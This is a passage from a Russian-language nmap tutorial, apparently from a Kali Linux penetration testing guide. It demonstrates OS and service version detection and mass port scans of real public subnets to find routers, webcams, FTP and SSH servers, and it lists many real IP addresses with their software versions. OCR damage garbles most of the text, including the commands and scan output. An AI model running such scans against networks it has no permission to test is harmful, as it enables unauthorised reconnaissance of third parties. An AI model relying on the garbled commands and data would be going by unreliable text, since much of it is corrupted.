гѵе г_2Ѳ12 сре:/о:Т гееЬзР:Т гееЬзР:6.2 

Аддгеззіѵе 05 диезэез: Місго5оТТ МіпРоыз 7 РгоТеззіопаІ ог Міпроыз 8 (93%), МісгозоТТ Ѵ/іпРоыз ѴізТа 5РѲ ог 5Р1, Ѵі/іпРоыз 5 
егѵег 2008 5Р1, ог Міпроыз 7 (93%), МісгозоТТ Міпроыз ѴізТа 5Р2, Міпроыз 7 5Р1, ог Міпроыз 5егѵег 2008 (93%), МісгозоТТ М 
іпРоЫ5 РВопе 7.5 ог 8.0 (92%), МіпРоыз 5егѵег 2008 К2 (92%), МісгозоТТ МіпРоЫ5 5егѵег 2008 К2 (91%), МісгозоТТ Міпроыз 5е 
гѵег 2008 5Р1 (91%), МісгозоТТ Міпроыз 7 (91%), МісгозоТТ Міпроыз 7 5Р1 (89%), МісгозоТТ Міпроыз 8 ЕпТегргізе (89%) 

N 0 ехасТ 05 шаТсВез Тог ВогТ (ТезТ сопРіТіопз поп-іРеаТ). 

КеТыогк ОізТапсе: 1 Вор 

05 РеТесТіоп регТогшеР. Ріеазе герогТ апу іпсоггесТ гезиІТз аТ ВТТрз://птар.огд/зиЬтіТ/ . 

Ктар Ропе: 1 ІР арргезз (1 В 05 Т ир) зсаппеР іп 27.02 зесопРз 

гооТ@МеЬМаге:-# | 


гоок@ѴѴеЬѴѴаге: - о к 

Файл Правка Вид Поиск Терминал Справка 


птар -0 - -оззсап-диезг ыеЬыаге.Ьіг 

БТагТіпд Кшар 6.49ВЕТА4 ( ВТТрз://птар.огд ) аТ 2015-08-28 16:11 М5К 
N 11 ^ зсап герогТ Тог ыеЬыаге.Ьіг (185.26.122.50) 

НозТ із ир (Ѳ.23з ІаТепсу). 

^N5 гесогр Тог 185.26.122.50: зеп/50-26. ВозТІапр. ги 

N01 зВоып: 986 сіозер рогТз 

РОКТ 5ТАТЕ 5ЕКѴІСЕ 

21/Тср ореп ТТр 

25/Тср ореп зшТр 

8Ѳ/Тср ореп ВТТр 

111/Тср ореп грсЫпР 

135/Тср ТіІТегеР шзгрс 

139/Тср ТіІТегеР пеТЬІ05-53П 

443/Тср ореп ВТТрз 

445/Тср ТіІТегеР шісгозоТТ-Рз 

873/Тср ореп гзупс 

1022/Тср ореп ехр2 

1024/Тср ореп кРш 

2049/Тср ореп пТз 

3306/Тср ореп шузді 

4443/Тср ореп рВагоз 

Йеѵісе Туре: депегаі ригрозе|ТігеыаІІ|зТогаде-тІ5с 

Киппіпд (ЗІБТ СиЕ55ІИ6): Ипих 2.6.Х|З.Х (95%), МаТсВСиагР Рігеыаге 11.X (88%), 5упо1оду Ипих (88%) 

05 СРЕ: сре:/о:Ііпих:Ііпих кегпеІ:2.6 сре:/о:1іпих:1іпих кегпеІ:3 сре:/о:ыаТсВдиагР:Тігеыаге:11 сре:/о:зупоІоду:1іпих к 
егпеі 

Аддгеззіѵе 05 диезгез: Ипих 2.6.32 (95%), 1_іпих 3.10 (93%), Ипих 2.6.32 - 2.6.39 (93%), (_іпих 2.6.32 - 3.0 (91%), Пп 
их 3.2 - 3.8 (90%), МаТсВСиагР Рігеыаге 11.8 (88%), 5упо1оду 0ізк5ТаТіоп Мападег 5.1 (88%), Ипих 2.6.32 - 2.6.35 (87%) 
, Ипих 2.6.38 (87%), Ипих 2.6.39 (87%) 

N 0 ехасТ 05 шаТсВез Тог Во5Т (Те5Т сопРіТіоп5 поп-іРеаТ). 

05 РеТесТіоп регТогшеР. Ріеазе герогТ апу іпсоггесТ гезиІТз аТ ВТТр5://птар.огд/зиЬшіТ/ . 

Кшар Ропе: 1 ІР аРРгегз (1 ВозТ ир) зсаппеР іп 509.22 зесопРз 
_:-# |__ 


Эта команда позволяет пользователю проверить службы, запущенные на цели. 
Обратите внимание, что появился столбик ѴЕК5ІОІМ — в нём указана версия 
программного обеспечения. 


1 


51ІСІО птар -5Ѵ [ІР адрес] или [адрес веб-сайта] 
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мв 


гооІ@ѵѴеЬѴѴаге: — 


Файл Правка Вид Поиск Терминал Справка 


гооі:@17еЬ'«7аг :-# птар -зѴ гаііпих. ги 

Біагііпд Мшар 6.49ВЕТА4 ( №{р5://птар.огд ) аі 2015- 
Мтар зсап герогі: Тог гаііпих.ги (185.26.122.38) 

Но5І із ир (0.28з Іаіепсу) . 

гОМБ гесогсі Тог 185.26.122.38: 5егѵ38-26.Ио5ІІапс1. ги 
N01 5Іюѵ/п: 986 сіозесі рогіз 


8-28 17:01 М5К 


РОКТ 

5ТАТЕ 

5ЕКѴІСЕ 

ѴЕК5І0М 

21/1ср 

ореп 

Пр 

РгоРТРй 1.3.5гс3 

25/1ср 

ореп 

зтір 

Розіііх вгпірсі 

80/Іср 

ореп 

НІІр 

пдіпх 1.6.3 

88/1ср 

ореп 

Иіір 

АрасНе НПрсІ 2.2.26 ((ІШх) 

111/іср 

ореп 

грсЫпй 

2-4 (РРС #100000) 

135/Іср 

ііііегесі 

Ш5 ГрС 


139/Іср 

Тіііегегі 

ПеІЬІ05-55П 


443/Іср 

ореп 

55І/Ы1:р 

пдіпх 1.6.3 

445/Іср 

іИІегей 

ШІСГ050ІІ-СІ5 


873/Іср 

ореп 

гзупс 

(ргоіосоі ѵегзіоп 30) 

1022/іср ореп 

55И 

ОрепББН 5.3 (ргоіосоі 2.0) 

1024/Іср ореп 

55І1 

ОрепББН 5.3 (ргоіосоі 1.99) 

3306/Іср ореп 

тувді 

МуБОЬ 5.5.35-33.0-1од 

4443/Іср ореп 

551/ИІІр 

АрасПе ИІІрсІ 2.4.10 ((ІІпіх) 


.3.29) 


Бегѵісе ІпТо: НозТ: зегѵЗв.ИозТІапсІ. ги; 05: Упіх 


РНР/5.3.29 трт-і1;к/2.4.7-Ѳ2 ОрепББШ.Ѳ. Іе-іірз) 


МБегѵісе сіеіесііоп регіогтегі. Ріеазе герогі апу іпсоггесТ гезиііз аі ИТТр5://птар.огд/5иЬтіТ/ 
шар сіопе: 1 ІР асісігезз (1 ИобТ ир) зсаппесі іп 601.51 бѳсопсіб 
:-# | 


Ищем веб-сервера, роутеры, веб-камеры, 55Н, РТР и прочее 

О том, как задавать цели для ІМтар, сказано в книге на которую в конце дана ссылка. В 
следующих примерах я использую строку 193.106.148-153.1-255. Она означает 
просканировать подсети с 193.106.148.* по 193.106.153.*, причём в каждой из этих 
подсетей будут просканированы адреса с *.*.*1 по *.*.*255, т.е. это 193.106.148.1- 
255, 193.106.149.1-255, 193.106.150.1-255 и т.д. 

Поиск роутеров, веб-серверов, веб-камер 

У роутеров, веб-серверов, веб-камер обычно открыты порты 80, 8080 и 1080. 
Просканировать эти порты и вывести только те адреса, на которых что-то открыто, 
можно этой командой. 


1 


птар -55 -5Ѵ -ѵѵ -п -Рп -Т5 193.106.148-153.1-255 -р80,8080,1080 -об - | §гер ’ореп' 


В моём случае вывод получился сумбурным, но это хорошо, что данных много — есть с 
чем поработать. 


гмар -55 -$Ѵ -ѵѵ -п -Рп -Т5 193. 1Ѳ6. 148-153.1-255 -р8Ѳ.888Ѳ.1Ѳ88 оС - | дгер 'ореп' 

051: 193. 1Ѳ6. 148.2 () Рогіа: 88/ореп/»ср//ІПір///. 1Ѳ8Ѳ/сІ05в<)/»ср//50Ск5///. 8Ѳ8Ѳ/с105е<і/Іср//)>»»р-ргоху/// 

051: 193.1Ѳ6.148.9 () Рог»5: 8Ѳ/Ш»еге<1/»ср//ІіІІр///. 1Ѳ8Ѳ/сІО5е0/»ср//5ОСк5///, 8Ѳ80/ореп/»ср//П»»р//2оре Щ(р0 2.12.1 (ру»Иоп 2.6.2. 1іпих2; 25егѵег|1.1)/ 

05»: 193.1Ѳ6.148.1Ѳ О Рог»5: 8Ѳ/Ш»еге<і/»ср//)і»Ір///. 1Ѳ8Ѳ/сІ05еа/»ср//50Ск5///, 8Ѳ8Ѳ/ореп/»ср//Ь»»р//2оре Ы1р0 2.12.1 (руііюп 2.6.2. 1іпих2; 25егѵег|1.1)/ 

05»: 193.1Ѳ6.148.12 О Рог»5: 8Ѳ/ореп/»ср//)і»»р//Арас6е М1»р0 1.3.42 ((АІ.Т Іітіх|аІ»0.М51.1) РНР5|5.2.2 ИІІЬ 5иІЮ5Іп-Ра»сМ ги5|РІЗѲ.22)/, 1Ѳ8Ѳ/сІ05ес)/Іср//50ск5///, 8Ѳ80/сІО5еО/»ср//Ь»»р-ргоху/// 
05»: 193.186.148.16 () Рог»5: 8Ѳ/Ш»еге<1/Іср//(іІ»р///, 1Ѳ8Ѳ/сІ05ей/»ср//50Ск5///, 8Ѳ8Ѳ/ореп/»ср//5$\|Н»»р-ргоху/// 

05»: 193.186.148.17 О Рог»5: 8Ѳ/ореп/»ср//М»р//АрасПе ЫІрО 2.2.24 ((Цпіх) РНР5|5.3.27 «1»П 5и)>оЯп-РаісП)/. 1Ѳ8Ѳ/сІ05еР/»ср//50Ск5///, 8ѲвѲ/с105ев/»ср//к»»р-ргоху/// 

05»: 193.186.148.28 () Рог»5: 8Ѳ/ореп/»ср//Ь»»р//АрасПе Ы»рО 2.4.6 ((ЦЬипІи))/, 1Ѳ8Ѳ/сІ05е<1/»ер//50Ск5///. 8Ѳ80/сІО5ей/»ср//Ь»»р-ргоху/// 

05»: 193.186.148.21 () Рог»5: 8Ѳ/ореп/»ср//И»»р//АрасІ)е Гі»»рО 2.2.24 ((Цпіх) РНР515.3.29 ыі»И 5иПоЯп-Ра»с6 пюО 55І|2.2.24 Ореп55І.|1.О.0і)/, 108Ѳ/Ш»еге<і/»ср//5Оск5///, 8Ѳ8Ѳ/орвп/Іср//ІсрѵгарреО/// 

05»: 193.186.148.22 () Рог»5: 88/ореп/»ср//Іі»»р//АрасГіе ПІІрР 2.2.24 ((Цпіх) РНР5|5.3.27 ыі»П 5иПо5іп-Ра»сЩ/, 1Ѳ8Ѳ/сІ05«)/»ср//50ск5///, 8Ѳ8Ѳ/с!о5е<1/»ср//Іі»»р-ргоху/// 

05»: 193.186.148.27 () Рог»5: 8Ѳ/ореп/»ср//М»р//АрасПе Гі»»рО 2.2.24 ((Цпіх) РНР515.3.27 «і»6 5иИоЯп-Ра»сЩ/, 1Ѳ8Ѳ/сІО5е0/»ср//5ОСк5///, 8Ѳ8Ѳ/с105ев/»ср//М»р-ргоху/// 

05»: 193.186.148.28 () Рог»5: 8Ѳ/ореп/»ср//П»»р//Арас)іе ЫІрО 2.2.24 ((Цпіх) РНР5|5.3.27 *1»П 5иПо5Іп-Ра»сЩ/, 1888/сІО5е0/»ср//5ОСк5///, 8Ѳ8Ѳ/с105в(1/»ср//П»»р-ргоху/// 

оЯ: 193.186.148.29 () Рог»5: 8Ѳ/ореп/»ср//П»»р//АрасПе ЬЧрО 2.2.24 ((Цпіх) РНР5|5.3.27 «»І> 5иГи>5іп-Ра»сП)/, 1Ѳ8Ѳ/сІ05в<)/Іср//5ОСк5///, 8Ѳ8Ѳ/с105е<»/»ср//М»р-ргоху/// 

05»: 193.186.148.33 () Рог»5: 8Ѳ/ореп/»ср//Іі»Ір//пдіпх 1.6.3/. 1Ѳ8Ѳ/тіегесІ/Іср//50Ск5///, 8Ѳ8Ѳ/Ш»еге<і/»ср//Ь»»р-ргоху/// 

05»: 193.186.148.34 () Рог»5: 8Ѳ/ореп/»ср//(і»»р//пдіпх 1.6.3/, 1888/Ш»вгей/»ср//50ск5/// . 8Ѳ8Ѳ/Ш»еге<1/»ср//)і»»р ргоху/// 

05»: 193.186.148.36 () Рог»5: 8Ѳ/ореп/»ср//П»»р//пдіпх 1.6.3/, 1888/Ш»егеО/»ср//50Ск5///. 8Ѳ8Ѳ/Ш»еге<1/»ср//()»1р-ргоху/// 

05»: 193.186.148.37 () Рог»5: 88/ореп/(ср//І\»(р//пдіпх 1.6.3/, 1888/Я1»егеО/»ср//50ск5///, 8Ѳ8Ѳ/»Н»егев/»ср//Іі»Ір-ргоху/// 

05»: 193.186.148.38 () Рог»5: 8Ѳ/ореп/»ср//П»»р//пд1пх 1.6.3/, 1Ѳ8Ѳ/ШІегев/»ср//50Ск5///. 8Ѳ8Ѳ/Ш»еге<1/Іср//Мір-ргоху/// 

05»: 193.186.148.39 () Рог»5: 80/ореп/»ср//ІіІ»р//пдіпх 1.6.3/, 1Ѳ8Ѳ/т»егей/»ср//50Ск5///, 8Ѳ8Ѳ/т»егеО/»ср//М»р-ргоху/// 

05»: 193.186.148.48 () Рог»5: 80/ореп/»ср//Іі»»р//лдіпх 1.6.3/, 1Ѳ8Ѳ/ПІ»еге<і/»ср//50ск5///, 8Ѳ8Ѳ/Ш»еге<1/»ср//))1»р-ргоху/// 

05»: 193.186,148.41 О Рог»5: 8Ѳ/ореп/»ср//ІИ»р//пдіпх 1.6.3/, 1Ѳ8Ѳ/Ш»еге<)/Іср//50ск5///. 8Ѳ8Ѳ/т»еге<)/»ср//()»»р-ргоху/// 

05»: 193.186.148.49 О Рог»5: 8Ѳ/ореп/»ср//М»р//АрасЬе МІрО 1.3.42 ((АЫ Ипох|а118.М51.1) РНР5|5.2.2 *і»Іі 5иЬо5іп-Ра»с(і ги5 РІЗѲ.22)/, 1Ѳ8Ѳ/сІО5е0/»ср//5оск5///, 808Ѳ/сІО5е<1/1ср//Ы1р-ргоху/// 

05»: 193.186.148.58 () Рог»5: 8Ѳ/ореп/»ср//П»»р//АрасПе МІрЦ 1.3.42 ((АІТ ипох|аІ»Ѳ.М51.1) РНР515.2.2 м1»Ь ЗцОоЯп-РаісМ ги5 РІЗѲ.22)/, 1Ѳ88/сІ05ер/»ср//50Ск5///. 8Ѳ8Ѳ/сІО5е0/»ср//Щ»р-ргоху/// 

05»: 193.186.148.51 () Рог»5: 8Ѳ/ореп/»ср//Ь»»р//АрасЬе Ь»»рО 1.3.42 ((АЬТ Япих|аІ»Ѳ.М51.1) РНР5|5.2.2 ИІІЬ 5иІЮ5Іп-Ра»сІі ги5 РІЗѲ.22)/, 1Ѳ8Ѳ/с1о5е0/»ср//5оск5///. 8080/сІО5еО/»ср//)>»»р-ргоху/// 

05»: 193.1Ѳ6.148.52 () Рог»5: 88/ореп/»ср//Іі»»р//Арас(іе Ь»»р<і 1.3.42 < (АЬТ 1Дпих|а1»0.М51.1) РНР5 1 5.2.2 мі»Ь $иЬо5Іп-Ра»сІі гиа РЬЗѲ.22)/, 1Ѳ8Ѳ/сІО5вй/»ср//50Ск5///, 8888/с1о5вО/»ср//Ь»»р-ргоху/// 

05»: 193.1Ѳ6.148.53 О Рог»5: 8Ѳ/ореп/»ср//П»»р//АрасПе Ы»ргі 1.3.42 ((А1.Т Ыпих|а1»8.М51.1) РНР5|5.2.2 «і»Ь 5иЫ>5іп-Ра»с& ги5 РЬЗѲ.22)/. 1Ѳ8Ѳ/сІО5е0/»ср//5ОСк5///, 8Ѳ8Ѳ/сІ05«1/»ср//Ь»»р-ргоху/// 

05»: 193.1Ѳ6.148.54 () Рог»5: 8Ѳ/ореп/Іср//й»»р//АрасПе Й»»рО 1.3.42 ((АЫ Ііпих|аІ»Ѳ.М51.1) РНР515.2.2 ѵѵііб ЗиРоЯп-РаІсМ гиа РІЗѲ.22)/, 1Ѳ8Ѳ/сІО5е0/»ср//5ОСк5///, 8Ѳ8Ѳ/сІО5е0/»ср//М»р-ргоху/// 

05»: 193.1Ѳ6.148.55 () Рог»5: 8Ѳ/ореп/»ср//И»»р//Арас(іе ПІІрй 1.3.42 ((АІТ ІЛпих|аІ»8.М51.1) РНР5|5.2.2 «Ик 5и(юЯп-Ра»сИ ги5 РІЗѲ.22)/, 1Ѳ8Ѳ/сІ05еа/»ср//50Ск5///, 8Ѳ8Ѳ/сІО5е0/»ср//Ы»р-ргоху/// 

(05»: 193.186.148.56 О Рог»5: 8Ѳ/ореп/»ср//)і»»р//АрасПе Ыірр 1.3.42 ((АСТ ипих|аІ»Ѳ.Н51.1) РНР5|5.2.2 м1»І> 5иЬояп-Ра»с)і ги5 РІЗѲ.22)/, 1Ѳ8Ѳ/сІО5е0/»ср//5ОСк5///, 8Ѳ8Ѳ/сІо5еО/»ср//(»ІІр-ргоху/// 

І05»: 193.186.148.57 () Рог»5: 8Ѳ/ореп/»ср//Ь»»р//АрасГ>е Ы»р<1 1.3.42 ((АІТ Ьіпих|аІ»Ѳ.М51.1) РНР5 1 5.2.2 мі»0 5иИо5іп-Ра»сИ ги5 РЬЗѲ.22)/, 1Ѳ8Ѳ/сІО5е0/(ср//5ОСк5///, 8Ѳ8Ѳ/сІО5е0/»ср//(*»»р-ргоху/// 

оЯ: 193.186.148.58 () Рог»5: 8Ѳ/ореп/»ср//Іі»»р//Арас6е Я»ргі 1.3.42 ((АЬТ 1.іпих|аИв.М51.1) РНР5|5.2.2 мі»П 5иЫ)Яп-Ра»сІі ги5 РЬЗѲ.22)/, 1Ѳ8Ѳ/сІ05ва/»ср//50ск5///, 8888/с1о5вО/»ср//Ь»»р-ргоху/// 

05»: 193.186.148.59 О Рог»5: 8Ѳ/ореп/»ср//И»»р//АрасПе Ь»»рО 1.3.42 <(АІТ Ііпих аІ»Ѳ.М51.1) РНР515.2.2 *і»Г» 5и(юЯп-Ра»сЬ гиа РЬЗѲ.22)/, 1Ѳ8Ѳ/сІ05еа/»ср//50Ск5///, 8Ѳ8Ѳ/с105е<)/»ср//Ь»»р-ргоху/// 

оЯ: 193.186.148.68 () Рог»5: 8Ѳ/ореп/»ср//И»»р//Арасбе М»рО 1.3.42 ((АН Иги1х|а118.М51.1) РНР5 1 5.2.2 м1»Ь 5и(ю5іп-Ра»с(і гиа РЬЗѲ.22)/. 1Ѳ8Ѳ/сІ05еа/»ср//50ск5///, 8Ѳ8Ѳ/сІо5еО/(ср//Ь((р-ргоху/// 

оЯ: 193.186.148.61 () Рог»5: 80/ореп/»ср//ІіІ»р//АрасЛе 61»р0 1.3.42 ((АІТ Ііпих|аІ»Ѳ.М51.1) РНР5|5.2.2 м1»0 5и(юЯп-Ра»с(і гиа РЬЗѲ.22)/, 1Ѳ8Ѳ/сІО5е0/»ср//5ОСк5///, 8088/сІО5е<1/»ср//МІр-ргоху/// 

оЯ: 193.1Ѳ6.148.62 () Рог»а: 8Ѳ/ореп/»ср//)іІІр//АрасПе П»»рО 1.3.42 ((А1.Т ипих|аІ»Ѳ.М51.1) РНР5|5.2.2 мі»И 5иИ05іп-Ра»сІі гиа РЬЗѲ.22)/, 1Ѳ8Ѳ/сІ05ва/»ср//50Ск5///, 8Ѳ8Ѳ/сІО5в0/»ср//И»»р-ргоху/// 

05»: 193.186.148.88 () Рог»а: 8Ѳ/ореп/»ср//П»»р//СгауІод2 П»»р<1/, 1Ѳ8Ѳ/Ш»ег«1/1ср//50Ск5///, 8Ѳ8Ѳ/Ш»еге(1/Іср//»і»»р-ргоху/// 

05»: 193.186.148.94 () Рогіа: 8Ѳ/ореп/»ср//6»»р//»іпі П»»рР 1.19 19йес2Ѳ03/, 1Ѳ8Ѳ/Ш1егей/»ср//50Ск5///, 8Ѳ8Ѳ/Ш»егеа/»ср//Іі»»р ргоху/// 

05»: 193.186.148.187 () Рог»$: 88/ореп/»ср//М»р//А5и5 КТ-М12 МАР П»»р сопТід/, 1Ѳ8Ѳ/с105е<«/»ср//5оск5///, 888Ѳ/сІо$е<1/»ср//ІіІІр-ргоху/// 

05»: 193.186.148.188 () Рог»5: 8Ѳ/ореп/»ср//М»р//ТР-ИЫК МЙ841Н МАР 0»»р сопПд/, 1Ѳ8Ѳ/ПІ»егск1/»ср//50Ск5///, 8Ѳ8Ѳ/Ш»егеР/»ср//П»»р-ргоху/// 

оЯ: 193.186.148.189 () Рог»5: 8Ѳ/ореп/»ср//Ь»»р///, 1Ѳ8Ѳ/»іІ»еге<1/»ср//50ск5///, 8Ѳ8Ѳ/Т11»еге<)/»ср//(і»»р-ргоху/// 

05»: 193.186.148.113 () Рог»а: 8Ѳ/ореп/Іср//Ь»»р//Сі5СО 105 Ь»»р сопТід/, 108Ѳ/сІО5в<1/»ср//5Оск5///. 8Ѳ8Ѳ/с105еа/»ср//М»р-ргоху/// 

05»: 193.186.148.114 () Рог»5: 8Ѳ/Ш»еге<1/»ср//Ь»»р///, 1Ѳ8Ѳ/ГіІ»егеа/»ср//50ск5///, 8Ѳ8Ѳ/ореп/»ср//(і»»р//МаѵерІи5 НТТРО (ТПошаоп ТС5Ѳ8 051 гои»вг|/ 

05»: 193.186.148.116 () Рог»5: 8Ѳ/ореп/»ср//(і»Ір//«іпі П»»рй 1.19 19бес2ѲѲЗ/, 1Ѳ8Ѳ/сІ05еа/»ср//50ск5///, 8888/с1о5«1/»ср//(»»1р-ргоху/// 

05»: 193.186.149.65 О Рогіа: 8Ѳ/ореп/»ср//П»»р///. 1Ѳ8Ѳ/сІ05е<1/»ср//50Ск5///, 8Ѳ8Ѳ/сІО5е0/Іср//к»»р-ргоху/// 

оЯ: 193.186.149.73 () Рог»5: 8Ѳ/ореп/»ср//П»»р///, 1Ѳ8Ѳ/сІ05е<І/»ср//50ск5///. 8888/с1о5е<)/»ср//1\»»р-ргоху/// 

05»: 193.186.149.82 () Рог»5: 8Ѳ/ореп/»ср//И»»р///, 1Ѳ8Ѳ/сІ05вй/»ср//50Ск5///, 8Ѳ80/сІО5ей/1ср//П»»р-ргоху/// 

05»: 193.186.149.97 () Рог»5: 8Ѳ/Ш»еге<1/»ср//Ь»»р///. 1Ѳ8Ѳ/сІ05ев/»ср//50Ск5///, 8Ѳ8Ѳ/ореп/»ср//Ы»р//2оре Ь»»ргі 2.12.1 (ру»Поп 2.6.2, 11пих2; 25егѵег|1.1)/ 

05»: 193.186.149.185 О Рог»$: 8Ѳ/ореп/»ср//Ы»р///. 1Ѳ8Ѳ/сІ05е<1/Іср//50ск5///, 8Ѳ8Ѳ/с105ей/»ср//И»»р-ргоху/// 

405»: 193.186.15Ѳ.65 () Рог»а: 8Ѳ/ореп/»ср//к»»р///, 1Ѳ8Ѳ/сІ05е<)/«ср//50Ск5///, 8Ѳ8Ѳ/с\05е<)/»ср//ІИ»р-ргоху/// 


(Нажмите на изображение, чтобы увеличить) 
По материалам сайта ѴѴеЬѴѴаге.Ьіі 
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Тестирование на проникновение с помощью КаМ Ыпих 2.0 


Поиск РТР 


Обычно РТР «висит» на 21 порту, поэтому используем предыдущую команду, только 
меняем сканируемый порт. 


1 


птар -5$ -зѴ -ѵѵ -п -Рп -Т5 193.106.148-153.1-255 -р21 -о<5 - | §гер 'ореп' 


гоо1@МеЬМаге:~ 


Нозі 

Нозі 

НозТ 

НобТ 

Нозі 

Нозі 

Нозі 

Нозі 

Нозі: 

Нозі; 

Нозі; 

Нозі; 

Нозі: 

Но5І 

Нозі 

Нозі 

Нозі: 

Нозі; 

Нозі: 

Нозі 

Нозі 

Нозі 

Нозі: 

Нозі: 

Нозі: 

Нозі: 

Нозі 

Нозі 


193.106 

193.106 

193.106 

193.106 

193.106 

193.106 

193.106 

193.106 

193.106 

193.106 

193.106 

193.106 

193.106 

193.106 

193.106 

193.106 

193.106 

193.106 

193.106 

193.106 

193.106 

193.106 

193.106 

193.106 

193.106 

193.106 

193.106 

193.106 


гооІ@МеЬИаге:- 


# птар 

148.9 ( 

148.10 

148.11 

148.12 
148.14 

148.16 

148.17 
148.19 
148.22 

148.27 

148.28 

148.29 

148.49 

148.50 

148.51 

148.52 

148.53 

148.54 

148.55 

148.56 

148.57 

148.58 

148.59 

148.60 

148.61 

148.62 
148.65 
149.97 

# | 


-55 -5Ѵ 
) Рогіз 
() РОГІ5 
() РоГІ5 
() РОГІ5 
() РОГІ5 
() Рогіз 
() Р0ГІ5 
() Ро ГІ5 
() Рогіз 
() Рогіз 
() Рогіз 
о Рогіз 
() Рогіз 
() Рогіз 
() Рогіз 
() Рогіз 
() Рогіз 
() Рогіз 
о Рогіз 
() Рогіз 
() Рогіз 
() Рогіз 
() Рогіз 
() Рогіз 
() Рогіз 
() Рогіз 
О Рогіз 
() Ро ГІ5 


ѵѵ -п -Рп -Т5 193.106.148-153.1-255 -р21 -об - | дгер 'ореп' 
21/ореп/1ср//11р//ѵз11р(1 2.3.5/ 

21/ореп/1ср//11р//ѵз11р(1 2.3.5/ 

21/ореп/1ср//11р//ѵз11рсІ 2.3.5/ 

21/ореп/1ср//11р//ѵз11р(1 (Ьеіоге 2.0.8) ог ѴЩ-РТРЭ/ 
21/ореп/Іср//11р//ѵз11рсі 3.0.2/ 

21/ореп/Іср//11р//ѵз11рсі 2.2.0/ 

21/ореп/1ср//11р//ѵз11рс1 3.0.2/ 

21/ореп/1ср//11р//ѵз11рсІ 2.2.1/ 

21/ореп/1ср//11р//ѵз11р(1 3.0.2/ 

21/ореп/1ср//11р//ѵз11р(1 3.0.2/ 

21/ореп/1ср//11р//ѵз11рс1 3.0.2/ 

21/ореп/1ср//11р//ѵз11рсІ 3.0.2/ 

21/ореп/1ср//11р//ѵ5І1рс1 (Ьеіоге 2.0.8) ог ѴШ-РТРО/ 
21/ореп/Іср//ІсрѵѵгарресІ/// 

21/ореп/1ср//1срѵѵгарресІ/// 

21/ореп/1ср//11р//ѵз11рсі (Ьеіоге 2.0.8) ог Ш-РТРЬ/ 
21/ореп/1ср//11р//ѵз11рс1 (Ьеіоге 2.0.8) ог Ш-РТРО/ 
21/ореп/Іср//Ісрѵѵгаррес)/// 

21/ореп/1ср//11р//ѵз11рс1 (Ьеіоге 2.0.8) ог ѴШ-РТРО/ 
21/ореп/1ср//1срмгарресі/// 

21/ореп/Іср//Ісрѵѵгаррес1/// 

21/ореп/Іср//ІсрѵѵгарресІ/// 

21/ореп/1ср//1срмгарресІ/// 

21/ореп/1ср//1срмгаррес1/// 

21/ореп/1ср//1срмгаррес1/// 

21/ореп/1ср//1срмгаррес1/// 

21/ореп/1ср//11р//1п11р(1 2Ѳ100324+С55АРІ/ 
21/ореп/1ср//11р//ѵз11рсІ 2.3.5/ 


Хороший результат, есть на что посомтреть. 

Поиск 55Н 


Порт по умолчанию для 55Н — 22, там и ищем. 


1 


птар -з5 -зѴ -ѵѵ -п -Рп -Т5 193.106.148-153.1-255 -р22 -об - | §гер 'ореп' 


Есть контакт: 


. I Файл Пр; 


гооі@ѴѴеЬѴѴаге: - 


Файл Правка Вид Поиск Терминал Справка 


ге:- 

Нові: 193.106 
Нові: 193.106 
Нові: 193.106 
Нов! : 193.106 
Нові: 193.106 
Нові: 193.106 
Нові: 193.106 
Нові: 193.106 
Нові: 193.106 
Нові: 193.106 
Нозі: 193.106 
Нозі: 193.106 
Нозі: 193.106 
‘Нові: 193.106 
Нові: 193.106 
)1@ѴІеЬМаге:- 


# птар 
148.7 ( 

148.9 ( 

148.10 

148.16 

148.17 
148.20 
148.22 

148.27 

148.28 

148.29 
148.65 
149.75 
149.81 
149.97 
150.67 

# I 


-в5 -вѴ 
) Рогіз 
) Рогіз 
() Рогіз 
() Рогіз 
() Рогіз 
О Рогіз 
() Рогіз 
() Рогіз 
() Рогіз 
() Ро ГІ5 
О Рогіз 
() Рогіз 
() Рогіз 
() Рогіз 
() Ро ГІ5 


ѵѵ -п -Рп -Т5 193.106.148-153.1-255 -р22 -об - | дгер 'ореп' 
22/ореп/1ср//ззН//0реп55Н 5.9 (ргоіосоі 2.0)/ 

22/ореп/1ср//ззІі//0реп55Н 5.9 (ргоіосоі 2.0)/ 

22/ореп/1ср//ззН//0реп55Н 5.9 (ргоіосоі 2.0)/ 

22 /ореп/1ср//5зН//0реп55Н 5.3 (ргоіосоі 2.0)/ 

22 /ореп/1ср//53Іі//0реп55Н 5.9 (ргоіосоі 2.0)/ 

22 /ореп/1ср//35Іі//0реп55Н 6.2р2 ЦЬипІи 6 (ЦЬипІи Ипих; ргоіосоі 2.0)/ 
22/ореп/1ср//ззН//0реп55Н 5.9 (ргоіосоі 2.0)/ 

22/ореп/1ср//ззН//0реп55Н 5.9 (ргоіосоі 2.0)/ 

22 /ореп/1ср//5з(і//0реп55Н 5.9 (ргоіосоі 2.0)/ 

22 /ореп/1ср//з5Іі//0реп55Н 5.9 (ргоіосоі 2.0)/ 

22 /ореп/1ср//55Іі//0реп55Н 6.2 (ргоіосоі 2.0)/ 

22 /ореп/1ср//55Н//0реп55Н 5.3 (ргоіосоі 2.0)/ 

22 /ореп/1ср//5зН//Сізсо 55Н 1.25 (ргоіосоі 1.99)/ 
22/ореп/1ср//зз)і//0реп55Н 5.9 (ргоіосоі 2.0)/ 

22 /ореп/1ср//55Ь//С1зсо 55Н 1.25 (ргоіосоі 1.99)/ 
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Помните, что на дефолтных портах оставляют либо от недостатка опыта (начинающие 
системные администраторы), либо от безысходности (например, хостеры — если они 
поменяют порт РТР со стандартного на другой, то служба технической поддержки будет 
завалена жалобами клиентов о том, что «РТР совсем не работает»). Все остальные 
системные администраторы «подвешивают» 55Н и прочие сервисы на высокие порты. 
Если сделать так, то в логах ошибок наступает тишь и благодать, разница очень заметна 
по сравнению со стандартными портами, на которые вечно шлют разную фигню и 
пытаются брутфорсить. А вменяемые люди вообще не используют РТР, а используют 
сервисы с шифрованием, хотя бы тот же 5РТР (вариантов РТР с шифрованием масса). Но 
хостеры не могут себе этого позволить по уже озвученной причине — есть опасность 
потерять клиентов оттого, что им слишком сложно разобраться. 


Т.е. если вы тестируете на проникновение конкретный компьютер/сервер, то 
проверяйте все порты — с первого до последнего (65535). Если диапазон тестируемой 
сети небольшой, то можно задать тестирование всех портов с фильтрацией по словам 
^Тр ( | §гер ЧТр'), 5зЬ ( | §гер 'ззб') и т. д. Например так: 


1 


птар -55 -5Ѵ -ѵѵ -п -Рп -Т5 193.106.148.1-255 -р1-65535 -об - | §гер ЧТр' 


Нужно быть готовым к большим затратам времени. 


2ептар — Графический интерфейс (СІИ) для ІЧтар 

У команды птар огромное количество опций. Если вы запутались в этих опциях и 
